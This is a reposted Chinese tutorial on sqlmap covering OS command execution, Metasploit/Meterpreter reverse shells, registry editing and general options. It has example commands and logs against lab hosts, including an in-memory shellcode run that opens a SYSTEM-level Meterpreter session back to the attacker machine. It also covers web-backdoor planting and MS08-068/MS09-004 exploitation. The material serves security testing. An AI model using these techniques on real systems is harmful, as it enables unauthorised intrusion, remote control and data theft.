2. 程式人生 > >安全測試===sqlmap(叁)轉載

安全測試===sqlmap(叁)轉載

阿新 發佈:2018-02-13
test compile awl .net 4.0 lose 問題 自定義函數 命令行參數 腳本

十五、操作系統控制

1.執行任意操作系統命令

參數:--os-cmd和--os-shell

若數據庫管理系統是MySQL、PostgreSQL或微軟的SQL Server且當前用戶有相關權限Sqlmap就能利用SQL註入執行任意的操作系統命令。

當數據庫管理系統是MySQL或PostgreSQL時,Sqlmap會通過前面介紹過的文件上傳功能上傳一個包含用戶自定義函數sys_exec()和sys_eval()的二進制共享庫文件,然後創建這兩個用戶自定義函數,通過這兩個函數之一來執行用戶指定的命令。選擇哪個函數取決於用戶是否想要顯示命令執行的標準輸出。

當數據庫管理系統是微軟的SQL Server時,Sqlmap通過存儲過程xp_cmdshell來執行任意命令。 若xp_cmdshell被禁用(SQL Server >= 2005時默認禁用)Sqlmap會啟用它; 若xp_cmdshell不存在,Sqlmap會創建它。

當用戶想要看到命令執行的標準輸出時,Sqlmap使用可列舉的註入技術(盲註、帶內和基於錯誤的註入),而當用戶不想看到命令執行的標準輸出時,堆查詢註入技術將被用於執行命令。

下例的目標是PostgreSQL:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1

部分輸出如下所示:

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF ‘sys_eval‘ already exist
[hh:mm:12] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:12] [INFO] creating UDF ‘sys_eval‘ from the binary UDF file
[hh:mm:12] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
‘uid=104(postgres) gid=106(postgres) groups=106(postgres)‘
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF ‘sys_eval‘? [Y/n] y
do you want to remove UDF ‘sys_exec‘? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

使用參數“--os-shell”可以模擬一個可以執行任意命令的shell,和“--sql-shell”一樣這個shell也可以用Tab鍵補全,支持歷史記錄。

當堆查詢不被支持(如PHP或ASP+Mysql)且數據庫管理系統是MySQL時,仍然可以通過SELECT的從句INTO OUTFILE在Web所在主機的可寫目錄創建一個Web後門,通過這個Web後門來執行命令。Sqlmap支持這一技術並要求用戶提供一些用逗號分割的可能是可寫目錄的路徑。Sqlmap支持以下這些服務器端腳本語言:

  • ASP
  • ASP.NET
  • JSP
  • PHP

2.帶外TCP連接:Meterpreter及相關

參數:--os-pwn、--os-smbrelay、--os-bof、--priv-esc、--msf-path和--tmp-path

若數據庫管理系統是MySQL、PostgreSQL或微軟的SQL Server且當前用戶有相關權限Sqlmap就有可能在攻擊者的主機和數據庫所在主機之間建立帶外TCP連接。根據用戶的選擇,此連接可以是交互式命令shell,Meterpreter會話或圖形用戶界面(VNC)會話。

Sqlmap要靠Metasploit生成shellcode,在數據庫所在主機執行shellcode有以下四種技術:

  • 數據庫通過Sqlmap創建的用戶自定義函數sys_bineval()在內存中執行Metasploit的shellcode。支持MySQL和PostgreSQL。參數“--os-pwn”。
  • 通過Sqlmap自己的用戶自定義函數(MySQL和PostgreSQL中的sys_exec(),微軟SQL Server中的xp_cmdshell())上傳並執行Metasploit的“stand-alone payload stager”。參數:“--os-pwn”。
  • 利用遠程代碼執行漏洞MS08-068。攻擊者的機器要用Metasploit的smb_relay監聽來自目標機器的連接。要求在Linux/Unix上以root權限運行Sqlmap且目標DBMS在Windows上以管理員權限運行。參數:“--os-smbrelay”。
  • 在微軟SQL Server 2000和2005中可通過存儲過程sp_replwritetovarbin的堆緩沖區溢出漏洞(MS09-004)在內存中執行Metasploit的shellcode。Sqlmap有自己的數據執行保護繞過技術可以成功利用漏洞,但需要Metasploit生成shellcode以便在成功利用漏洞時執行shellcode。參數:“--os-bof”。

下面是以MySQL為目標的例子:

python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF ‘sys_bineval‘ already exist
[hh:mm:33] [INFO] checking if UDF ‘sys_exec‘ already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF ‘sys_bineval‘ from the binary UDF file
[hh:mm:34] [INFO] creating UDF ‘sys_exec‘ from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF ‘sys_bineval‘ (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF ‘sys_bineval‘, please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The ‘priv‘ extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS            : Windows .NET Server (Build 3790, Service Pack 2).
Computer      : W2K3R2
Architecture  : x86
Meterpreter   : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask    : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask    : 255.255.255.0

meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit

在Windows中Mysql默認以SYSTEM身份運行,但PostgreSQL無論是在Windows還是在Linux中都以低權限的用戶postgres運行。SQL Server 2000默認以SYSTEM身份運行,但SQL Server 2005到2008大多數時間以NETWORK SERVICE身份運行,少數時候以LOCAL SERVICE身份運行。

使用參數“--priv-esc”可以執行Metasploit的getsystem命令以嘗試提升權限。

十六、Windows註冊表操作

滿足以下條件就可以對Windows註冊表進行操作:

  • 目標數據庫管理系統是運行在Windows上的
  • 目標數據庫管理系統是MySQL、PostgreSQL或微軟SQL Server
  • 支持堆查詢
  • 目標數據庫管理系統當前用戶有足夠的權限

1.讀Windows註冊表鍵值

參數:--reg-read

2.寫Windows註冊表鍵值

參數:--reg-add

3.刪除Windows註冊表鍵值

參數:--reg-del

4.輔助

參數:--reg-key、--reg-value、--reg-data和--reg-type

適當使用上列參數就可以在命令中添加或修改一個Windows註冊表鍵值而不用在Sqlmap運行時以問答方式提供數據。

  • --reg-key:指定Windows註冊表鍵值的路徑
  • --reg-value:指定Windows註冊表鍵值的鍵
  • --reg-data:指定Windows註冊表鍵值的值
  • --reg-type:指定Windows註冊表鍵值的值的數據類型

下面是一個例子:

  python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

十七、通用選項

1.從SQLite文件中載入Sqlmap會話

參數:-s

Sqlmap會自動地為每一個目標創建長久保存的會話SQLite文件,該文件統一存儲在特定目錄(如:~/.sqlmap/output/)中,其中保存著恢復會話所需的所有數據。若用戶想要明確地指定SQLite文件(例如想要將多個目標的數據存儲到同一個SQLite文件中),可使用此參數。

2.將HTTP(S)流量記錄到日誌文件中

參數:-t

該參數後跟一個文件路徑,用於將HTTP(S)請求和響應以文本格式記錄到文件中作為日誌。這樣的日誌在調試時是很有用的。

3.非交互模式

參數:--batch

使用該參數可以讓Sqlmap以非交互模式運行,所有要求的輸入都會取默認值。

4.設置字符編碼

參數:--charset

為正確解碼數據,Sqlmap會使用Web服務器提供的信息(如HTTP頭部中字符編碼的設置),或是使用第三方庫chardet來啟發式地確定字符編碼。

可以使用參數“--charset”來指定字符編碼,如“--charset=GBK”。

5.從目標URL開始爬取目標站點

參數:--crawl

Sqlmap可以從目標URL開始爬取目標站點並收集可能存在漏洞的URL。使用該參數還需要設置爬取深度,深度是相對於開始爬取的目標URL而言的。只有所有新鏈接都被遞歸地訪問過後才算爬取結束。建議該參數與“--delay”配合使用。

下例的目標的MySQL:

  python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3

部分輸出如下:

[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:00] [INFO] 42/56 links visited (75%)

參數:--crawl-exclude

在此參數後跟一個正則表達式可以排除不想爬取的URL。若URL匹配正則,則不被爬取。如用“--crawl-exclude=logout”來排除所有含有字符串“logout”的URL。

6.設置輸出CSV文件中的分隔符

參數:--csv-del

當數據被輸出到CSV文件(--dump-format=CSV)時,默認以“,”分隔,可以使用此參數指定分隔符。如:“--csv-del=";"”。

7.數據庫管理系統認證憑據

參數:--dbms-cred

在某些情況下由於數據庫管理系統當前用戶權限較低從而導致動作執行失敗,此時可以用此參數提供admin用戶認證憑據,Sqlmap就會對執行失敗的部分特地使用“run as”機制(如:微軟SQL Server的OPENROWSET)以admin用戶身份重新執行失敗的動作。當然,得知道admin用戶認證憑據才行。

8.數據輸出格式

參數:--dump-format

Sqlmap對列舉的數據有三種不同的輸出格式:CSV、HTML和SQLITE。默認為CSV格式,每個數據表都被保存到一個文本文件中,一行是一條記錄,以逗號分隔(或是用“--csv-del”指定分隔符)。選擇HTML格式,所有數據被保存在一個HTML文件中,數據存放在一個個table中。選擇SQLITE格式,所有數據被保存在一個SQLITE文件中,SQLITE中表名和結構會和原表相同。

9.估計完成時間

參數:--eta

該參數用於顯示估計的完成時間。下例是目標為Oracle的布爾型盲註:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta

部分輸出如下:

[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                           ] 11/64

Then:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:
‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod‘

如你所見,Sqlmap先計算查詢輸出的長度,然後估計完成時間,最後顯示百分比進度條並統計已經接受的數據。

10.刷新會話文件

參數:--flush-session

使用該參數可以刷新會話文件,以避免Sqlmap默認的緩存機制可能造成的一些問題。使用該參數的前提是真正理解會話文件的概念。另外一個可行的方法是手工刪除會話文件。

11.解析和測試表單輸入字段

參數:--forms

除了用“-r”和“--data”來測試表單數據是否存在註入點外,還可以使用參數“--forms”來測試表單數據是否存在註入點。

同時使用參數“--forms”和“-u”,Sqlmap會解析目標URL(“-u”指定的那個URL)返回頁面中的表單,測試表單是否有註入點,而不對目標URL進行註入測試。

12.忽略會話文件中的查詢結果

參數:-fresh-queries

使用此參數用於忽略會話文件中的查詢結果重新執行查詢。

13.對返回結果使用HEX函數

參數:--hex

非ASCII數據很容易在傳輸時出錯,使用hex函數可以將目標數據庫中數據以十六進制返回。

下例的目標是PostgreSQL:

  python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

部分輸出如下所示:

[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [<a href=‘function.pg-query‘>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>‘
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

14.指定輸出目錄路徑

參數:--output-dir

Sqlmap默認將會話文件和結果文件保存到某個子目錄output中,可以使用此參數指定輸出目錄,如:“--output-dir=/tmp”。

15.從響應中解析DBMS的錯誤信息

參數:--parse-errors

若是Web應用被配置成Debug模式則很可能在HTTP響應頁面中顯示SQL錯誤信息。這些錯誤信息對於理解某操作失敗的原因是很有用的。例如因為權限不足導致的失敗錯誤信息是類似這樣的:“Access denied for user ”。

下例的目標是微軟SQL Server:

  python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors

部分輸出如下所示:

[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the timeneeded to find the right number of query columns. Automatically extending the rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] parsed error message: ‘Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>‘
[xx:xx:17] [INFO] target URL appears to have 3 columns in query

16.指定中軸列

參數:--pivot-column

有時(如在微軟SQL Server、Sybase和SAP MaxDB中)由於缺乏類似機制不可以直接使用偏移m,n的方式列舉數據表記錄。在這種情況下,Sqlmap通過確定最適合的中軸列(最獨特的值)來列舉數據,中軸列的值稍後用於檢索其他列值。

如果自動選擇失敗就需要使用該參數手動指定中軸列,如:“--pivot-column=id”。

17.保存選項到配置文件中

參數:--save

使用該參數可以保存Sqlmap命令行參數到配置文件中,該文件可編輯並且可以使用參數“-c”加載。配置文件是INI格式的。

18.升級Sqlmap

參數:--update

使用此參數可以升級Sqlmap,顯然,需要能夠連接互聯網。萬一執行失敗,可以在Sqlmap安裝目錄中執行“git pull”來升級Sqlmap。在Windows中沒有git命令可以使用SmartGit之類的git客戶端。

實際上“--update”和“git pull”以同樣的方式升級Sqlmap,都是從git倉庫中獲取最新源代碼。

強烈建議在報告bug前先升級Sqlmap

安全測試===sqlmap(叁)轉載

相關推薦

安全測試===sqlmap轉載

test compile awl .net 4.0 lose 問題 自定義函數 命令行參數 腳本 十五、操作系統控制 1.執行任意操作系統命令 參數:--os-cmd和--os-shell 若數據庫管理系統是MySQL、PostgreSQL或微軟的SQL Server且當前

安全測試===sqlmap轉載

tab 操作 空白字符 基於 偽靜態 復雜 gnu pri user 六、優化 這些參數可以優化Sqlmap的性能。 1.一鍵優化 參數:-o 添加此參數相當於同時添加下列三個優化參數: --keep-alive --null-connection --threads=3

安全測試===sqlmap轉載

有著 quest ignore having dba pen 關閉 發出 轉載 十八、雜項 1.使用簡寫 參數:-z 有些參數組合是被經常用到的,如“--batch --random-agent --ignore-proxy --technique=BEU”,這樣寫一大串很

安全測試===sqlmap轉載

聯合查詢 .post tails trie word 問題 lang 密碼 cer 本文轉自:https://blog.werner.wiki/sqlmap-study-notes-0/ 感謝作者的整理,如有侵權,立刪 零、前言 這篇文章是我學習Sqlmap的用法時做的

安全測試===sqlmap轉載

ont qlite 表名 ide score fire 執行 語句 rds 十二、列舉數據 這些參數用於列舉出數據庫管理系統信息、數據結構和數據內容。 1.一鍵列舉全部數據 參數:--all 使用這一個參數就能列舉所有可訪問的數據。但不推薦使用,因為這會發送大量請求,把有用

安全測試回顧

屏蔽 管理 sets 大致 rest sta 方便 server 進行 SQL註入 幾乎每一個web應用都需要使用數據庫來保存操作所需的各種信息,所以web程序經常會建立用戶提交的數據的SQL語句。如果,建立這種語句的方法不安全,那麽應用程序就很容易受到SQL註入的攻擊。最

Selenium2+python自動化54-unittest生成測試報告HTMLTestRunner轉載

logs mage 部分 art 測試結果 函數返回 top default 執行 本篇轉自博客:上海-悠悠 原文地址:http://www.cnblogs.com/yoyoketang/tag/unittest/ 前言 批量執行完用例後,生成的測試報告是文本形式的,不夠直

Google C++單元測試框架---Gtest框架簡介譯文[轉載]

一、設定一個新的測試專案  在用google test寫測試專案之前,需要先編譯gtest到library庫並將測試與其連結。我們為一些流行的構建系統提供了構建檔案: msvc/ for Visual Studio, xcode/ for Mac Xcode, make/ f

JMeter接口測試示例

jmeter 請求方式 user mon idt 長度 參數 方式 mil 獲取用戶余額 功能描述 獲取用戶余額:傳入userid獲取用戶余額 請求地址 http://api.nnzhp.cn/getmoney 請求方式 Post請求 入參 ,入參是json類型

網絡安全知多少

log nbsp term 電子 瀏覽器 最大 track 附件 網絡 計算機網絡安全措施主要包含保護網絡安全、保護應用服務安全和保護系統安全三個方面。以下我就針對這三方面分別進行大概解釋。 一、保護網絡安全 網絡安全是為保護商務各方網絡端系

2017 計蒜之道 初賽 第五場 C. UCloud 的安全秘鑰中等

移動 如果 space -m 變化 安全 ont con esp 暴力。 $O(m*n)$的算法可以通過此題,每次詢問$O(m)$掃S數組,統計不同數字的個數,每次移動最多只會變化兩個數字,如果不同數字個數為$0$,那麽答案加$1$。 #include <io

2017 計蒜之道 初賽 第五場 D. UCloud 的安全秘鑰困難

暴力打表 con ucloud 小數 math logs cnblogs urn 導致 小數據打表,大數據暴力。 導致超時的主要原因是$m$小的詢問次數太多,可以把$m≤10$的答案直接暴力打表存起來,$m>10$的用$C$題的方法即可。 #includ

計蒜客第五場 UCloud 的安全秘鑰中等 (尺取遊標法

sca http 數組 desc 出現 滿足 說明 tom tor 每個 UCloud 用戶會構造一個由數字序列組成的秘鑰,用於對服務器進行各種操作。作為一家安全可信的雲計算平臺,秘鑰的安全性至關重要。因此,UCloud 每年會對用戶的秘鑰進行安全性評估,具體的評估方法如

計蒜客 UCloud 的安全秘鑰 ——hash

pan ref namespace mes 能夠 targe com print lower   題目鏈接:https://nanti.jisuanke.com/t/15769。   題意是求可以變換位置以後相同的子串有多少個,那麽做法是只要每個數字的平方和,立方和以及四次

mysql之 mysql數據庫壓力測試工具mysqlslap

root .cn this 用戶 cas bench 測試 逗號 complete mysqlslap是從MySQL的5.1.4版開始就開始官方提供的壓力測試工具。通過模擬多個並發客戶端並發訪問MySQL來執行壓力測試,同時提供了較詳細的SQL執行數據性能報告,並且能很好的

mysql編譯安裝詳細(轉載)

所有 man 同時 wget borde ins s參數 set sysconf mysql編譯安裝(詳細) 一、編譯安裝MySQL前的準備工作 安裝編譯源碼所需的工具和庫 yum install gcc gcc-c++ ncurses-dev

做QA的日子——iOS測試入門

版本號 使用 evernote 賬號 每一個 移動 研發 溝通 一個人 坦言,做QA的這半年我沒有成長,就算有成長也非常少,我非常難過。和身邊的人講事實上並沒有誰能真正理解自己的難過,事實上還是自己不夠努力。對自己不夠狠,以前認為自己不夠幸運,想有一個更好的指路人,

【轉】JMeter學習十八JMeter測試Java

sets interval permsize int 文件 不同 時間 結果 argument 實例: 服務為:將輸入的兩個參數通過IO存入文件; 1、打開MyEclipse,編寫Java代碼 服務: package test; import java.io.F

Python+selenium之測試報告2

def window win get hot 過程 https 書寫 screen 1 # -*- coding: utf-8 -*- 2 import HTMLTestReport 3 import HTMLTestRunner 4 import os 5 i

銀聯接口測試——詳細JAVA

環境 cas .com 出現問題 技術 接口測試 -- 說明 tomcat7.0 準備材料   1、註冊賬號 https://open.unionpay.com/ajweb/register?locale=zh_CN   2、▼登錄賬號 -->幫助中心-->